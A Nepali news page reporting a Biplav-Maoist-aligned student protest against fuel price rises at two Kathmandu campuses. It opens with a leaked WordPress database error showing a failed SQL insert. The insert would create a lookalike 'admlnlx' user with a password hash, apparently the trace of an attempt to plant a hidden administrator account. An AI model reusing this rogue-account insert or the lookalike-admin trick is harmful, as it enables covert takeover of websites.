WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/crxwr7OeAbExJNEgyBNyT5Eg9DJH0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 13:39:27', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ६-
सरकारले पेट्रोलियम पदार्थमा गरेको मूल्यबृद्धिको बिरोधमा विप्लव माओवादी निकट बिद्यार्थी संगठनले राजधानीका केहि क्याम्पसअगाडि बिरोध प्रदर्शन गरेको छ ।
मूल्यबृद्धिको बिरोधमा विप्लव माओवादी निकट अखिल क्रान्तिकारीले अमृत साइन्स क्याम्पस र सरस्वती क्याम्पसअगाडि गरेको बिरोध प्रदर्शनले त्यस क्षेत्रको ट्राफिक व्यवस्था अस्तव्यस्त बनेको छ ।
बिद्यार्थी संगठनले बिहान ९ बजेदेखि १० बजेसम्म प्रदर्शन गरेका थिए । मूल्यबृद्धिको बिरोधमा अखिल क्रान्तिकारीले उपत्यका बन्दको आहृवान गरेको छ ।